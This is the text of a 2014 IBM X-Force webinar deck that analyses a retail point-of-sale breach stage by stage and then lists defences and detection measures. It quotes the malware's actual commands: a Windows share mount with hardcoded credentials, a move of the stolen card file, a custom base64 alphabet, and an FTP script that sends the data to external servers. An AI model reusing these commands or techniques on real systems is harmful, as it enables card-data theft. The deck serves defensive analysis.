Anatomy of an Advanced Retail Breach

© 2012 IBM Corporation

IBM Security Systems

1© 2014 IBM Corporation

Anatomy of an Advanced Retail Breach

Chris PoulinResearch Strategist, X-Force

February 2014



2

Agenda

About the IBM X-Force

Dissection of a retail attack and data breach

Solutions to prevent similar compromises

Note: Information provided by IBM in this webinar and the associated blog entry is derived from research by the author and/or the IBM X-Force, and is based on publicly available sources. No information was obtained by, or otherwise derived from, any confidential information shared with IBM.



3

X-Force is the foundation for advanced security and threat research across the IBM Security Framework

The mission of X-Force is to:

Monitor and evaluate the rapidly changing threat landscape

Research new attack techniques and develop protection for tomorrow’s security challenges

Educate our customers and the general public



4

Collaborative IBM teams monitor and analyze the changing threat landscape

Coverage

20,000+ devices under contract

3,700+ managed clients worldwide

15B+ events managed per day

133 monitored countries (MSS)

1,000+ security related patents

Depth

17B analyzed web pages & images

40M spam & phishing attacks

73K documented vulnerabilities

Billions of intrusion attempts daily

Millions of unique malware samples



5

Anatomy of the Breach

Attacker phishes a 3rd party contractor

Attacker finds & infects POS systems

w/malware

Malware scrapes RAM for clear text CC stripe data

Malware sends CC data to internal server; sends

custom ping to notify

Attacker finds & infects internal

Windows file server

Stolen data is exfiltrated to FTP

servers

Contractor portals

Retailer POS systems

Retailer Windows file server

Firewall

1

3a

4

5

6

Attacker uses stolen credentials

to access contractor portals

2

Attacker FTP servers (external/Russia)

3b

internal network



6

1. Phish a 3rd Party Contractor

HVAC firm in PA

Email malware campaign

Citadel password stealing bot, variant of Zeus banking trojan

Primary method of malware detection free version of Malwarebytes Anti-Malware

On-demand scanning; not for commercial use

Supplier portal contains lots of public information

– Example: list of resources for HVAC companies

Attacker phishes a 3rd party contractor

1



7

2. Access & exploit contractor portal

Contractor portal

Attacker uses stolen credentials

to access contractor portal

2

pdzone.retailer.com, 61.225.130.104, NS @ retailer.com

amlogin.ewips.partnersonline.com

161.225.202.98, NS @ retailer.com

Contractors generally not required to use token or other 2-factor authentication

service.ariba.com

216.109.104.11

NS @ ariba.com



8

3a. Discover & exploit internal file server

Exact method of movement from portal to internal server unknown

Probably not HVAC partner—cloud-based, not on retailer extranet

Back-end connect from partner portal or other retailer owned asset?

SQL injection, browser exploit, open ingress port, who knows?

Or maybe contractors had access to internal network to monitor HVAC systems remotely


Windows file server


3a



9

3a. Discover & exploit internal file server (cont’d)

Intel from contractor portal? Lots of resources; example: Excel spreadsheets with useful metadata

– Created by username John.Doe– Printed recently on Windows \\DOMAIN\

Google search easily reveals location of retail datacenters:

Malware to accumulate stolen card data and exfiltrate regularly(may have been 2 separate servers)

– Username=“Best1_user”; password=“BackupU$r”

– Same username is installed with BMC Software Performance Assurance for Microsoft Server; password is not generated by BMC

– Installed as “BladeLogic”, hiding as BMC component, BladeLogic Automation Suite; however, BMC doesn’t name any component “bladelogic.exe”

– System / Administrator level account; can run batch jobs


Windows file server


3a



10

3b. Find & infect POS systems

Attacker finds & infects POS systems

w/malware



3b

With a point of presence on an internal server, it’s all unicorns and rainbows from here. Evil unicorns

Image source: http://bigsnarf.wordpress.com/2013/03/10/using-mapreduce-for-fraud-detection-and-prevention/



11

4. Malware scrapes card data from RAM

Trojan.POSRAM, variant of BlackPOS

No anti-virus solution had a signature for the malware at the time of the attack, or at the time of disclosure

Looks for “pos.exe” process

Installs trojan, creates registry entries containing string “POSWDS”

Scrape RAM for track 1 and track 2 data of financial cards

Card track data is encrypted

– Between the reader and POS, and

– again between the POS and payment processor

Unencrypted momentarily at the POS as the transaction is cleared

Debit card PINs are hashed at the card reader

Chip-and-PIN encrypts the transaction from the card to processor

Stores stolen card data in file %SystemRoot%\system32\winxml.dll

Malware scrapes RAM for clear text CC stripe data


4



12

5. Harvested card data is sent to internal rally point

Moves stolen card data to a central collection point

Assumes POS systems have no internet access

Creates temp Windows share on domain

Malware on rally point creates share in %windir%\twain_32

Encodes base64, with encoding string

JN8hdEe3P0cUMTs5kQolDWC9BV26GjRIZnXfOF+K4rYtmqg7b/y1xwvpHiLAzSau

Moves winxml.dll to \\<RallyPoint>_<Day>_<Mon>_<Hr>.txt

POS malware sends custom ICMP to as semaphore

Malware sends CC data to internal server; sends

custom ping to notify



5

net use S: \\<HardCodedIP>\c$\WINDOWS\twain_32 /user:Best1_user BackupU$rmove %windir%\system32\winxml.dll S:\<InfectedMachineName>_<Day>_<Month>_<Hour>.txt”net use S: /del



13

6. Card data is exfiltrated to FTP servers in Russia

Compiles all card dumps into c:\windows\twain_32a.dll

Exfiltrates data via FTP to <PublicFTPServer>/public_html/cgi-bin

Generates an FTP script and executes ftp –s <path>\\cmd.txt

Stolen data is exfiltrated to FTP

servers

Retailer Windows file server6

Attacker FTP servers (external/Russia)



14

Protect endpoints

The ultimate prize:

– POS systems: where the card data is processed

– File servers: base of operations

– Web servers: initial incursion vector

– Contractor workstations: intelligence, credentials

Malware protection:

– Contractor workstations (phishing, Citadel bot)

– POS systems: RAM scraper trojan

– File servers: data management and exfiltration tools

– Application isolation (Intel SGX; micro-virtualization, etc) to prevent RAM scraping

Patch

Configuration management



15

Protection against web and file server compromises

Secure development lifecycle (SDLC)

– Secure coding practices training

– Static/source code analysis—manual (code review) and automated

– Dynamic code analysis (esp low hanging fruit: SQL injection & XSS)

– Include compiled application, web applications, mobile apps

Go-live security process

– Harden system (reduce footprint/services, suppress excess information, harden apps, change usernames / passwords)

– Install appropriate endpoint protection and configuration management

– Vulnerability scan

Appropriate authentication

– Separate domains / administrative credentials (identity separation)

– Multi-factor authentication



16

Enumerate & classify

Restrict web assets’ access to internal systems

Isolate public / partner facing assets from private assets

Segment operational technology (OT), critical assets, and general IT

Perform firewall rule analysis, paying special attention to:

– assets containing sensitive data, such as cardholder information

– risky protocols and flow directions

For example, POS systems shouldn’t

– mount Windows shares, or

– send regular ICMP packets

Segment critical assets

Image source: http://nationalgeographic.com



17

Monitor & detect: network

Network activity pattern monitoring can detect:

– Suspicious scanning activity as attacker maps out the network landscape

– Policy violations for outbound FTP, especially to Eastern Bloc countries

Network packet inspection can detect:

– IPS can stop SQL injection, XSS, other more advanced attacks– Credit card number patterns in outbound data– Suspect strings in ICMP packets– Identify network traffic that is not what it seems: e.g.,

• Non-DNS protocol over port 53• IRC over port 80



18

Monitor & detect: vulnerability and anomaly detection Vulnerability scanning, including deep endpoint assessment

– example: registry entries containing “POSWDS”

Anomaly detection

– Profile behavior of critical assets, e.g., POS and HVAC systems (if remote access)

– Detect deviations from baseline:

• POS connecting to Windows shares

• POS emitting ICMP packets

– General anomalous behavior or change in network pattern: ICMP, SMB/CIFS, FTP– Profile ICMP packet sizes, normal payload contents; identify & block deviations



19

Incident Response

Speedy and complete forensics– early in the process if the compromise is detected before data is stolen, or – after a severe breach when accurate impact analysis is critical:

• Which systems were compromised? • How many customers were affected? • How much of the data comprised personal information?

Instrument everything feasible,– include POS systems and network activity– Enrich with context from

• vulnerability assessment tools• change management transactions• security intelligence feeds.

http://www.ibm.com/software/products/en/qradar-vulnerability-manager?ce=ISM0484&ct=SWG&cmp=IBMSocial&cm=h&cr=Security&ccy=US



20

Incident / emergency response

Plan should include– Detection– Response and escalation– Engaging law enforcement

as appropriate– Preservation of evidence– Compliance with regulations

and contractual agreements– Customer and press notification– Public relations.

Engage your contracted external emergency response agency in advance– Help you prepare for a breach and– Gather context about your environment.

Test your process regularly

Business associate contract and assessment



21

At IBM, the world is our security lab

v13-016,000IBM researchers, developers,

and subject matter expertsALL focused on security

3,000 IBM securitypatents

More than

Security Operations Centers

Security Research and Development Labs

Institute for Advanced Security Branches

© 2014 IBM Corporation22 IBM Security

Get Engaged with IBM X-Force Research and Development

Follow us at @ibmsecurity and @ibmxforce

Subscribe to X-Force alerts at iss.net/rss.phpor IBM Security blog at www.securityintelligence.com

Download X-Force security trend & risk reportshttp://www.ibm.com/security/xforce/

http://www.twitter.com/ibmsecurity

http://www.twitter.com/ibmxforce

http://iss.net/rss.php

http://www.securityintelligence.com/

http://www.ibm.com/security/xforce/

http://www.twitter.com/

http://www.twitter.com/

http://blogs.iss.net/

http://blogs.iss.net/



23

www.ibm.com/security

© Copyright IBM Corporation 2013. All rights reserved. The information contained in these materials is provided for informational purposes only, and is provided AS IS without warranty of any kind, express or implied. IBM shall not be responsible for any damages arising out of the use of, or otherwise related to, these materials. Nothing contained in these materials is intended to, nor shall have the effect of, creating any warranties or representations from IBM or its suppliers or licensors, or altering the terms and conditions of the applicable license agreement governing the use of IBM software. References in these materials to IBM products, programs, or services do not imply that they will be available in all countries in which IBM operates. Product release dates and/or capabilities referenced in these materials may change at any time at IBM’s sole discretion based on market opportunities or other factors, and are not intended to be a commitment to future product or feature availability in any way. IBM, the IBM logo, and other IBM products and services are trademarks of the International Business Machines Corporation, in the United States, other countries or both. Other company, product, or service names may be trademarks or service marks of others.

Statement of Good Security Practices: IT system security involves protecting systems and information through prevention, detection and response to improper access from within and outside your enterprise. Improper access can result in information being altered, destroyed or misappropriated or can result in damage to or misuse of your systems, including to attack others. No IT system or product should be considered completely secure and no single product or security measure can be completely effective in preventing improper access. IBM systems and products are designed to be part of a comprehensive security approach, which will necessarily involve additional operational procedures, and may require other systems, products or services to be most effective. IBM DOES NOT WARRANT THAT SYSTEMS AND PRODUCTS ARE IMMUNE FROM THE MALICIOUS OR ILLEGAL CONDUCT OF ANY PARTY.

www.ibm.com/security

© Copyright IBM Corporation 2013. All rights reserved. The information contained in these materials is provided for informational purposes only, and is provided AS IS without warranty of any kind, express or implied. IBM shall not be responsible for any damages arising out of the use of, or otherwise related to, these materials. Nothing contained in these materials is intended to, nor shall have the effect of, creating any warranties or representations from IBM or its suppliers or licensors, or altering the terms and conditions of the applicable license agreement governing the use of IBM software. References in these materials to IBM products, programs, or services do not imply that they will be available in all countries in which IBM operates. Product release dates and/or capabilities referenced in these materials may change at any time at IBM’s sole discretion based on market opportunities or other factors, and are not intended to be a commitment to future product or feature availability in any way. IBM, the IBM logo, and other IBM products and services are trademarks of the International Business Machines Corporation, in the United States, other countries or both. Other company, product, or service names may be trademarks or service marks of others.

Statement of Good Security Practices: IT system security involves protecting systems and information through prevention, detection and response to improper access from within and outside your enterprise. Improper access can result in information being altered, destroyed or misappropriated or can result in damage to or misuse of your systems, including to attack others. No IT system or product should be considered completely secure and no single product or security measure can be completely effective in preventing improper access. IBM systems and products are designed to be part of a comprehensive security approach, which will necessarily involve additional operational procedures, and may require other systems, products or services to be most effective. IBM DOES NOT WARRANT THAT SYSTEMS AND PRODUCTS ARE IMMUNE FROM THE MALICIOUS OR ILLEGAL CONDUCT OF ANY PARTY.

http://www.ibm.com/security

http://www.ibm.com/security

Anatomy of an Advanced Retail Breach

Technology

Transcript of Anatomy of an Advanced Retail Breach